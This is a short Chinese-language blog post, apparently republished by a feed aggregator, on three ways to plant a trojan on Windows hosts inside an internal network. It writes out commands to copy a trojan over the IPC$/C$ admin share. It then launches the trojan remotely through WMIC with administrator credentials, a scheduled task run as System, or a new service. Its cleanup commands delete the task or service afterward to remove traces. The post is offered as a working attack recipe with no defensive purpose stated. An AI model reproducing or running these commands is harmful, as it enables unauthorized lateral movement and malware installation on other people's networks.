Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

内网IPC$种马的三种方法

0
0

copy muma.exe //host/c$/windows/temp/foobar.exe ? ? ##IPC拷贝木马文件

WMIC远程运行命令

wmic /node:host /user:administrator /p 密码 process call create “c:/windows/temp/foobar.exe”

schtasks计划任务远程运行

schtasks /create /tn foobar /tr c:/windows/temp/foobar.exe /sc once /st 00:00 ? ? ? ? ? ?/S host /RU System

schtasks /run /tn foobar /S host

schtasks /F /delete /tn foobar /S host ##清除schtasks

SC添加服务远程运行命令

sc //host create foobar binpath=“c:/windows/temp/foobar.exe” ? ?##新建服务,指向拷贝的木马路径

sc //host start foobar ? ? ? ?##启动建立的服务

sc //host delete foobar ? ?##完事后删除服务


Viewing all articles
Browse latest Browse all 12749

Latest Images

Trending Articles



click here for Latest and Popular articles on Electronic Design Automation (EDA)


Latest Images